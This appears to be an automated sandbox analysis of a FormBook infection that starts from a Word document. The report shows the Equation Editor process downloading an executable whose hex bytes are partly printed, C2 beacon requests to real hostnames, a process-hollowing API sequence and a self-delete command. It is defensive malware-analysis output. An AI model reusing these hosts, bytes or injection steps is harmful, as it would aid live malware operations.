                                                                                                                                                      Connection: Keep-Alive


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                      123.95.122.2480192.168.2.2249167C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                      Apr 8, 2021 13:09:08.675015926 CEST1INHTTP/1.1 200 OK
                                                                                                                                                      Date: Thu, 08 Apr 2021 11:09:09 GMT
                                                                                                                                                      Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
                                                                                                                                                      Last-Modified: Thu, 08 Apr 2021 04:59:44 GMT
                                                                                                                                                      ETag: "5e800-5bf6eea6ef000"
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      Content-Length: 387072
                                                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Content-Type: application/x-msdownload
                                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 8b 15 e2 5e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 ae 04 00 00 ec 96 03 00 00 00 00 a3 41 00 00 00 10 00 00 00 c0 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 9b 03 00 04 00 00 36 08 06 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 18 9b 03 67 00 00 00 84 0d 9b 03 3c 00 00 00 00 20 9b 03 a0 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 9b 03 9c 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 fa 9a 03 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 9a 03 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 63 ac 04 00 00 10 00 00 00 ae 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 88 d2 95 03 00 c0 04 00 00 1c 00 00 00 b2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 66 69 70 75 68 00 00 01 00 00 00 00 a0 9a 03 00 02 00 00 00 ce 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 77 75 74 61 00 00 00 79 11 00 00 00 b0 9a 03 00 04 00 00 00 d0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 65 77 00 00 00 00 07 49 00 00 00 d0 9a 03 00 4a 00 00 00 d4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 a0 2c 00 00 00 20 9b 03 00 2e 00 00 00 1e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 18 99 00 00 00 50 9b 03 00 9a 00 00 00 4c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL^A@6g< ,PX@.textc `.data@.fipuh@.wutay@.newIJ@@.rsrc, .@@.relocPL@B
                                                                                                                                                      Apr 8, 2021 13:09:08.675043106 CEST3INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 56 8d 44 24 08 50 8b f1 e8 46 25 00 00 c7 06 34 d2 da 03 8b c6 5e c2 04 00 cc cc cc cc cc cc cc c7 01 34 d2 da 03 e9 50 26 00 00 cc cc cc cc cc 56 8b f1 c7 06 34 d2 da 03 e8 3d 26 00 00 f6 44 24 08
                                                                                                                                                      Data Ascii: VD$PF%4^4P&V4=&D$tV-^D$QRT$QRf-D$QRT$QR"ffPffu+D$QRQV,
                                                                                                                                                      Apr 8, 2021 13:09:08.675064087 CEST4INData Raw: 92 f7 e9 03 d1 c1 fa 04 8b f2 c1 ee 1f 03 f2 8b 7b 10 8b cf 2b cd b8 93 24 49 92 f7 e9 03 d1 c1 fa 04 8b c2 c1 e8 1f 03 c2 3b c6 73 31 8b 54 24 1c 8b 44 24 1c c6 44 24 10 00 8b 4c 24 10 51 52 50 57 b9 01 00 00 00 e8 4a 16 00 00 83 c4 10 83 c7 1c
                                                                                                                                                      Data Ascii: {+$I;s1T$D$D$L$QRPWJ{_^];v%L$WPQT$RZ_^]V3FFfFPffu+^~rFP'3FFfN
                                                                                                                                                      Apr 8, 2021 13:09:08.675085068 CEST5INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc 55 8b 6c 24 08 56 57 8b f1 85 ed 74 46 8b 56 18 8d 46 04 83 fa 10 72 04 8b 08 eb 02 8b c8 3b e9 72 31 83 fa 10 72 04 8b 08 eb 02 8b c8 8b 7e 14 03 f9 3b fd 76 1d 83 fa 10 72 02 8b 00 8b 4c 24 14 51 2b e8 55 56
                                                                                                                                                      Data Ascii: Ul$VWtFVFr;r1r~;vrL$Q+UVc_^]|$vqF;s VRWvVNS^r,*u~rF_^]F_^]WUQP"~~r;[_^]S\$V
                                                                                                                                                      Apr 8, 2021 13:09:08.792984962 CEST7INData Raw: ff c7 45 fc 05 00 00 00 8b 7e 10 c6 45 b0 00 8b 45 b0 8b 4d b0 50 51 8d 5f e4 57 8b d7 8b cb e8 ce 0d 00 00 89 46 10 8b c3 8b 5d 10 83 c4 0c e8 ce 09 00 00 8b 45 10 8d 78 1c 8d 5d b4 e8 a0 09 00 00 8b cb e8 19 f4 ff ff 8b 4d f4 64 89 0d 00 00 00
                                                                                                                                                      Data Ascii: E~EEMPQ_WF]Ex]MdY_^[M3%]jhhDdPDD3PD$HdjhL$D$$D$ D$D$PL$$D$TRhL$$QD$(X!
                                                                                                                                                      Apr 8, 2021 13:09:08.793014050 CEST8INData Raw: e8 83 01 00 00 5f 8b c6 5e 5d 5b c2 08 00 8b c6 e8 63 00 00 00 84 c0 74 4c 83 7b 18 08 72 05 8b 4b 04 eb 03 8d 4b 04 83 7e 18 08 8d 6e 04 72 05 8b 45 00 eb 02 8b c5 8b 54 24 14 8d 0c 51 8d 1c 3f 53 51 8b 4e 18 8d 14 09 52 50 e8 b5 18 00 00 83 c4
                                                                                                                                                      Data Ascii: _^][ctL{rKK~nrET$Q?SQNRP~~rm3f+_^][VvF;sFPWV3;^u"~rv33;f^3f3;^VrBrw
                                                                                                                                                      Apr 8, 2021 13:09:08.793030024 CEST10INData Raw: 50 8d 4c 24 08 c7 44 24 04 00 00 00 00 e8 2f 0b 00 00 68 b8 09 db 03 8d 4c 24 08 51 c7 44 24 0c 34 d2 da 03 e8 00 18 00 00 8d 14 cd 00 00 00 00 2b d1 03 d2 03 d2 52 e8 03 15 00 00 83 c4 04 83 c4 10 c3 cc cc cc cc cc cc cc cc cc cc cc 83 c8 ff 33
                                                                                                                                                      Data Ascii: PL$D$/hL$QD$4+R3s,$PL$D$hL$QD$4RL$w3Q3sD$PL$D$ghL$QD$48
                                                                                                                                                      Apr 8, 2021 13:09:08.793050051 CEST11INData Raw: 8b 0c 24 33 cc e8 ce 03 00 00 59 c3 cc cc cc cc cc cc cc cc 6a ff 68 c5 ba 44 00 64 a1 00 00 00 00 50 a1 d0 c0 44 00 33 c4 50 8d 44 24 04 64 a3 00 00 00 00 33 c0 89 44 24 0c 3b c8 74 1a 6a ff 89 41 14 c7 41 18 0f 00 00 00 50 88 41 04 8b 44 24 1c
                                                                                                                                                      Data Ascii: $3YjhDdPD3PD$d3D$;tjAAPAD$P|L$dY~rFP3FFF~rFP3FFFPQD3$D$
                                                                                                                                                      Apr 8, 2021 13:09:08.793070078 CEST12INData Raw: c3 8b ff 55 8b ec 8d 45 1c 50 ff 75 18 ff 75 14 ff 75 10 ff 75 0c ff 75 08 e8 cc 29 00 00 83 c4 18 5d c3 8b ff 55 8b ec 8d 45 14 50 6a 00 ff 75 10 ff 75 0c ff 75 08 e8 fe 2a 00 00 83 c4 14 5d c3 8b ff 55 8b ec 8d 45 18 50 ff 75 14 ff 75 10 ff 75
                                                                                                                                                      Data Ascii: UEPuuuuu)]UEPjuuu*]UEPuuuu*]UEPuC'YY]UEPug'YY]UEPuu2']UEPuuR']``US]VWt&P>FV+
                                                                                                                                                      Apr 8, 2021 13:09:08.793088913 CEST14INData Raw: 85 d8 fc ff ff 89 85 28 fd ff ff 8d 85 30 fd ff ff 83 c4 0c 89 85 2c fd ff ff 89 85 e0 fd ff ff 89 8d dc fd ff ff 89 95 d8 fd ff ff 89 9d d4 fd ff ff 89 b5 d0 fd ff ff 89 bd cc fd ff ff 66 8c 95 f8 fd ff ff 66 8c 8d ec fd ff ff 66 8c 9d c8 fd ff
                                                                                                                                                      Data Ascii: (0,ffffffEM0Ij(PuujwTYhPM3[
                                                                                                                                                      Apr 8, 2021 13:09:08.795933008 CEST15INData Raw: 5d c2 04 00 8b ff 55 8b ec 8b 45 08 83 c1 09 51 83 c0 09 50 e8 ed 64 00 00 59 59 33 c9 85 c0 0f 9f c1 8b c1 5d c2 04 00 8d 41 08 c3 8b c1 c7 00 fc d2 da 03 c2 04 00 8b c1 c2 04 00 8b ff 56 6a 01 68 c8 c0 44 00 8b f1 e8 5f f6 ff ff c7 06 34 d2 da
                                                                                                                                                      Data Ascii: ]UEQPdYY3]AVjhD_4^UufYtu!YtDDuDhODfYVMhEPU=DuQluxjhBgYY]MZf9@u6


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                      2192.168.2.2249168203.76.236.10380C:\Windows\explorer.exe
                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                      Apr 8, 2021 13:10:40.007575989 CEST410OUTGET /nnmd/?RzuD=vRs6n4JW3em4syOJV7b+YJv/yKqWGc/3Y/UBZKRypASveBlD9HGJWlgQmcmxQu52M4L1eA==&-Zz=NpM4AjBPzV5hSni0 HTTP/1.1
                                                                                                                                                      Host: www.likehowto.com
                                                                                                                                                      Connection: close
                                                                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                      Data Ascii:
                                                                                                                                                      Apr 8, 2021 13:10:40.525779009 CEST410OUTGET /nnmd/?RzuD=vRs6n4JW3em4syOJV7b+YJv/yKqWGc/3Y/UBZKRypASveBlD9HGJWlgQmcmxQu52M4L1eA==&-Zz=NpM4AjBPzV5hSni0 HTTP/1.1
                                                                                                                                                      Host: www.likehowto.com
                                                                                                                                                      Connection: close
                                                                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                      Data Ascii:


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                      3192.168.2.224916945.142.156.4480C:\Windows\explorer.exe
                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                      Apr 8, 2021 13:10:56.630959034 CEST412OUTGET /nnmd/?RzuD=5eMcWOIW8Rc4h8QDZH6T6n9ePY1bhRzkU2oAA9D0h2F0eFvVxskwV1Msq4lSZpkiXepntw==&-Zz=NpM4AjBPzV5hSni0 HTTP/1.1
                                                                                                                                                      Host: www.7985699.com
                                                                                                                                                      Connection: close
                                                                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                      Data Ascii:
                                                                                                                                                      Apr 8, 2021 13:10:56.803525925 CEST412INHTTP/1.1 404 Not Found
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Thu, 08 Apr 2021 10:59:29 GMT
                                                                                                                                                      Content-Type: text/html
                                                                                                                                                      Content-Length: 146
                                                                                                                                                      Connection: close
                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                      Code Manipulations

                                                                                                                                                      Statistics

                                                                                                                                                      CPU Usage

                                                                                                                                                      Click to jump to process

                                                                                                                                                      Memory Usage

                                                                                                                                                      Click to jump to process

                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                      Behavior

                                                                                                                                                      Click to jump to process

                                                                                                                                                      System Behavior

                                                                                                                                                      Analysis Process: WINWORD.EXE PID: 648 Parent PID: 584

                                                                                                                                                      General

                                                                                                                                                      Start time:13:08:35
                                                                                                                                                      Start date:08/04/2021
                                                                                                                                                      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                                                                                                                      Imagebase:0x13fb90000
                                                                                                                                                      File size:1424032 bytes
                                                                                                                                                      MD5 hash:95C38D04597050285A18F66039EDB456
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Analysis Process: EQNEDT32.EXE PID: 2504 Parent PID: 584

                                                                                                                                                      General

                                                                                                                                                      Start time:13:08:36
                                                                                                                                                      Start date:08/04/2021
                                                                                                                                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      File size:543304 bytes
                                                                                                                                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Analysis Process: vbc.exe PID: 2616 Parent PID: 2504

                                                                                                                                                      General

                                                                                                                                                      Start time:13:08:38
                                                                                                                                                      Start date:08/04/2021
                                                                                                                                                      Path:C:\Users\Public\vbc.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      File size:387072 bytes
                                                                                                                                                      MD5 hash:29E8627D7B80C21FC98C82314F3DF5E2
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      Antivirus matches:
                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                      • Detection: 42%, ReversingLabs
                                                                                                                                                      Reputation:low

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Analysis Process: vbc.exe PID: 2564 Parent PID: 2616

                                                                                                                                                      General

                                                                                                                                                      Start time:13:08:39
                                                                                                                                                      Start date:08/04/2021
                                                                                                                                                      Path:C:\Users\Public\vbc.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      File size:387072 bytes
                                                                                                                                                      MD5 hash:29E8627D7B80C21FC98C82314F3DF5E2
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2117770021.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2117770021.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2117770021.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2117886001.00000000006F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2117886001.00000000006F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2117886001.00000000006F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2117786031.0000000000430000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2117786031.0000000000430000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2117786031.0000000000430000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      Reputation:low

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Analysis Process: explorer.exe PID: 1388 Parent PID: 2564

                                                                                                                                                      General

                                                                                                                                                      Start time:13:08:41
                                                                                                                                                      Start date:08/04/2021
                                                                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:
                                                                                                                                                      Imagebase:0xffca0000
                                                                                                                                                      File size:3229696 bytes
                                                                                                                                                      MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Analysis Process: NAPSTAT.EXE PID: 2820 Parent PID: 1388

                                                                                                                                                      General

                                                                                                                                                      Start time:13:08:52
                                                                                                                                                      Start date:08/04/2021
                                                                                                                                                      Path:C:\Windows\SysWOW64\NAPSTAT.EXE
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Windows\SysWOW64\NAPSTAT.EXE
                                                                                                                                                      Imagebase:0xed0000
                                                                                                                                                      File size:279552 bytes
                                                                                                                                                      MD5 hash:4AF92E1821D96E4178732FC04D8FD69C
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2376887110.0000000000220000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2376887110.0000000000220000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2376887110.0000000000220000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2376829396.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2376829396.00000000001B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2376829396.00000000001B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      Reputation:moderate

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Analysis Process: cmd.exe PID: 2700 Parent PID: 2820

                                                                                                                                                      General

                                                                                                                                                      Start time:13:08:56
                                                                                                                                                      Start date:08/04/2021
                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:/c del 'C:\Users\Public\vbc.exe'
                                                                                                                                                      Imagebase:0x4a890000
                                                                                                                                                      File size:302592 bytes
                                                                                                                                                      MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Analysis Process: EQNEDT32.EXE PID: 2936 Parent PID: 584

                                                                                                                                                      General

                                                                                                                                                      Start time:13:08:57
                                                                                                                                                      Start date:08/04/2021
                                                                                                                                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      File size:543304 bytes
                                                                                                                                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Chronological Activities

                                                                                                                                                      Disassembly

                                                                                                                                                      Code Analysis

                                                                                                                                                      Reset < >

                                                                                                                                                        Analysis Process: vbc.exe PID: 2616 Parent PID: 2504 vbc.exeCOMMON

                                                                                                                                                        Executed Functions

                                                                                                                                                        Function 00220110, Relevance: 22.7, APIs: 15, Instructions: 248memorynativethreadCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 00220156
                                                                                                                                                        • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0022016C
                                                                                                                                                        • CreateProcessA.KERNEL32(?,00000000), ref: 00220255
                                                                                                                                                        • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00220270
                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00220283
                                                                                                                                                        • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 002202C8
                                                                                                                                                        • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 002202E3
                                                                                                                                                        • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 00220304
                                                                                                                                                        • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0022032A
                                                                                                                                                        • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 00220399
                                                                                                                                                        • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 002203BF
                                                                                                                                                        • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 002203E1
                                                                                                                                                        • ResumeThread.KERNELBASE(00000000), ref: 002203ED
                                                                                                                                                        • CloseHandle.KERNELBASE(00000000), ref: 002203F9
                                                                                                                                                        • ExitProcess.KERNELBASE(00000000), ref: 00220412
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Virtual$MemoryProcess$AllocWrite$Thread$CloseContextCreateExitFileFreeHandleModuleNameReadResumeSectionUnmapViewWow64
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3514283409-0
                                                                                                                                                        • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                                                                                        • Instruction ID: 24a121265c30a97c9c079e1bb0a97a9fa099663222518ea946392e89d0634932
                                                                                                                                                        • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                                                                                        • Instruction Fuzzy Hash: 41B1C774A00209AFDB44CF98C895F9EBBB5FF88314F248158E909AB391D771AE41CF94
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00220420, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 00220533
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2085703168.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateWindow
                                                                                                                                                        • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                                                                                                                                                        • API String ID: 716092398-2341455598
                                                                                                                                                        • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                                                                        • Instruction ID: f2926542c452d504892dafbc97186a12241248fd75bb8c14f036e98f9cf9e057
